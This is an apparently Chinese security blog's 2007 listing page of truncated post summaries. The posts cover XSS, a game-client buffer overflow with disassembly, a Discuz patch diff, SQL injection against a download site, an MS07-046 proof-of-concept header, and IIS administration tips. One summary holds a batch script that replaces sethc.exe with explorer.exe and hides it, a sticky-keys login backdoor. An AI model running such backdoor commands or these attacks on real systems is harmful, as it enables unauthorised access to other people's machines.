上一页 1 ··· 3 4 5 6 7 8 9 10 11 ··· 23 下一页
  2007年9月4日
摘要: SIX存在的意义: 1、有权限限制的地方总是让人比较放心,比如后台、内网 .... 。而且有的程序官方否认后台漏洞的危险,比如*vbbs对以前那个数据备用得到shell的态度。的确,在权限的限制下,这样的漏洞很难直接被利用。 Xss就和上面的情况一样,也经常被程序员忽视,而且也不太好防,如果2个情况配合起来,那就意味着利用的难度将大大下降... 2、然后有的人会说xss攻击完全可以... 阅读全文
posted @ 2007-09-04 17:28 %5C 阅读(371) 评论(0) 推荐(0) 编辑
摘要: 服务器安全设置 >> IIS6.0的安装 开始菜单—>控制面板—>添加或删除程序—>添加/删除Windows组件 应用程序 ———ASP.NET(可选) |——启用网络 COM+ 访问(必选) |——Internet 信息服务(IIS)———Internet 信息服务管理器(必选) |——公用文件(必选)... 阅读全文
posted @ 2007-09-04 17:28 %5C 阅读(633) 评论(0) 推荐(0) 编辑
摘要: 影响版本: 联众游戏大厅2.7.0.8 (2007年8月16日发布) 未受影响版本: 联众还没补 :-) 成因: 联众的程序员过于信任用户输入,未检测用户提供的字符串长度,导致对象虚函数表指针被覆盖,从而获得系统控制权. 分析: IE先创建obj_vuln对象(为什么要在SetInfo()执行前做这个,没进行分析),位置恰好在obj_now对象下: 03803034 /$ 56 PUSH E... 阅读全文
posted @ 2007-09-04 17:17 %5C 阅读(433) 评论(0) 推荐(0) 编辑
摘要: 对比补丁我们发现在\include\discuzcode.func.php里: $discuzcodes['searcharray']['bbcode_regexp'] = array( //标签的正则 "/\[align=([^\[\补丁前 "/\[float=([^\[\补丁后 "/\[float=(left|right)\]/i" 继续看下面的codz是杂处理这2个标签的: ... 阅读全文
posted @ 2007-09-04 17:14 %5C 阅读(254) 评论(0) 推荐(0) 编辑
  2007年9月3日
摘要: 很多人都说什么ASP PHP JSP注射 其实注射最直接是跟数据库有关!然而那些脚本只是一种辅助 例如ASP/ASPX JSP 啥限制都没!而PHP则会把' 过滤为\' 但是若然不是MYSQL POSTGRESQL SQLITE的话这个功能就废了! 但是我觉得这些脚本语言都不狠~如果CFM的话 估计你就没折了! 具体各数据库相关信息请参看 ART OF WEB-SQL-INJECTION第1卷 感... 阅读全文
posted @ 2007-09-03 15:57 %5C 阅读(370) 评论(0) 推荐(0) 编辑
摘要: @echo off cls copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32 \dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h attrib c:\wi... 阅读全文
posted @ 2007-09-03 12:10 %5C 阅读(628) 评论(2) 推荐(0) 编辑
  2007年8月31日
摘要: 先随便点一个软件下载 官方都更新到2.4了,但是还是官方自己再用,不过也有漏洞哦 把下载地址复制到明小子里面,把I改成%69 看到了吗,没有改之前是不能注入额 恭喜,该URL可以注入! 数据库类型:Access数据库 阅读全文
posted @ 2007-08-31 17:32 %5C 阅读(314) 评论(0) 推荐(0) 编辑
摘要: /* * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code * by Hong Gil-Dong & Chun Woo-Chi * Yang yeon(?~1542), Korea * "I shall keep clenching my left fist unitl i see the real tao". * ... 阅读全文
posted @ 2007-08-31 17:31 %5C 阅读(342) 评论(0) 推荐(0) 编辑
  2007年8月30日
摘要: 在服务器上进行如下操作: 先在服务里关闭 iis admin service 服务. 找到 windows\system32\inetsrv\ 下的 metabase.xml 文件. 打开, 找到 ASPMaxRequestEntityAllowed 修改为需要的值(可修改为2M即: 2048000), 默认为: 204800, 即: 200K. 然后重启 iis... 阅读全文
posted @ 2007-08-30 12:53 %5C 阅读(273) 评论(0) 推荐(0) 编辑
  2007年8月29日
摘要: 运行regsvr32 jscript.dll和 regsvr32 vbscript.dll 重新注册JAVA脚本和VB脚本的动态链接库后一切正常 阅读全文
posted @ 2007-08-29 13:45 %5C 阅读(206) 评论(0) 推荐(0) 编辑
上一页 1 ··· 3 4 5 6 7 8 9 10 11 ··· 23 下一页